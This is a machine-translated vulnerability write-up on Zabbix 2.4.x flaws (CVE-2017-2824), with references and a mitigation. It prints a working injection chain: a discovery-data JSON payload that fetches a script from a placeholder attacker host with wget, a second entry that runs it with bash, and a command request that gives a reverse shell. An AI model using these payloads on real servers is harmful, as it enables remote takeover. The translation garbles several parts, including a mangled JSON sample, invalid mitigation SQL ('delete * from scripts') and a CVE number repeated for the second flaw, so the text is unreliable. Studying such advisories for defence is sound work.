! [](/Article/UploadPic/2017-5/201751153839393. jpg? www. myhack58. com)
About Zabbix
zabbix is a WEB-based interface to provide distributed system monitoring and network monitoring capabilities of enterprise-class open source solutions.
zabbix to monitor various network parameters, ensure that the server system of the security operations;and to provide flexible notification mechanism to allow system administrators to quickly locate/solve the existing issues.
Vulnerability description
Zabbix Server Active Proxy Trapper remote code execution vulnerability (CVE-2017-2824)★★★★
Zabbix 2.4. x in the trapper command function there is a code execution vulnerability, a particular data packet can cause command injection, and then remotely execute code, an attacker can be from a Zabbix proxy to initiate a request to trigger the vulnerability.
Vulnerability details
The vulnerability in Zabbix in the“Trapper”part of the code, its main function is to allow the Proxy and the Server communicate network services, TCP port 10051）Zabbix Server provides a set for the Zabbix Proxy the API calls, the two will discuss the“discovery data”and“request command”is. These requests are examples of data as shown below:
‘{“request”:“command”,“scriptid”:1,“hostid”:10001}’
'{“request”:“discovery data”,“host”:“zabbix-proxy.com”,“clock”:10,
“data”:[{“clock”:10,“drule”:1,"dcheck2,“type”:0,“ip:10.0.0.1, “dns”:“zabbix-agent.com”, port”:10050,“key”:“test”,“status”:0,“value”:“test_value”}]}
It should be noted that, the request command to call is located in the Zabbix database in a script, without performing any authentication. The vulnerability another key aspect is that by default, the Zabbix 2.4. X using the script below in the table 3 the script to populate the MySQL database:

scriptid == 1 == /bin/ping-c {HOST. CONN} 2>&1

scriptid == 2 == /usr/bin/traceroute {HOST. CONN} 2>&1

scriptid == 3 == sudo /usr/bin/nmap-O {HOST. CONN} 2>&1

The problem is that, in the calling Script, {HOST. CONN}field is actually the host of the IP address replacement. Replace{HOST. CONN}the value located in the Zabbixinterface table, and then save it as VARCHAR（64）type the“IP”field. Therefore, if the attacker can use the command injection to create an interface as the IP address, and by“command”request is running on{HOST. CONN}script, then the occurrence of command injection, and you can get a reverse shell.
The problem is that effectively the value is inserted into the Zabbixhost table. By default, unauthenticated attacker can not do this, it needs the system administrator of a secondary configuration, especially on the Zabbix auto-discovery function.
Zabbix auto-discovery and auto-registration function is allowed according to the Zabbix Proxy provides the Zabbix Server data to the Zabbix Server Configuration. More specifically, if the host according to the configuration of the server to the Zabbix Proxy provides certain characteristics, it may take certain actions, one will make the new discovered hosts are added to some of the Zabbix database tables. In this case, the host will be inserted into the“host”table, and will create an entrance to the Zabbixinterface in the table, the host provides the IP address into the IP column, and not the IP address of any verification.
Therefore, by using a suitable host to the server to send a discovery data request, commands can be injected into the database:
write_script_cmd=‘{
“request”:“discoverydata”,
“host”:“zabbix-proxy. domain. fake”,
“clock”:148535399,
“data”:[{
“clock”:1485353070,
“drule”:88,
“dcheck”:174,
“type”:0,
“ip”:“;wget-O/tmp/shttp://attacker-ip/s;#”,
“dns”:“host28. domain. fake”,
“port”:10050,
“key”:“sectest”,
“status”:0,
“value”:“lnxhost”
}]}’
Due to the ZabbixInterface table ip field size limit, the second host is inserted into another IP address table.
// The Host 2
ip:/bin/bash /tmp/s;#
In this two host is added thereafter, there is still a problem that don’t know the hostid command request, but this is easily solved. Violence request into the database, because a different command requests will return a different response, determining whether the host exists, once the presence of the host is determined, you can call them directly, and you can get a reverse shell. The command request is shown below
run_cmd = ‘{
“request”:“command”,
“scriptid”:1,
“hostid”:14666
}’

Mitigation measures
Remove the Zabbix database in the default script entry, you can directly manipulate the database to remove the sql is: use zabbix; delete * from scripts; can also use the graphical interface to delete (Administration->Scripts->Checkmarks->Delete Selected).

Zabbix Proxy database write Vulnerability(CVE-2017-2824)
Zabbix 2.4. x in the trapper function there is a database write vulnerability-specific malware trapper data packet through the database logic checks, cause the database is written, an attacker can MiTM a way to modify the zabbix proxy and the Server between the request to trigger the vulnerability.
Impact version
Zabbix 2.4.7 - 2.4. 8r1
Reference
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076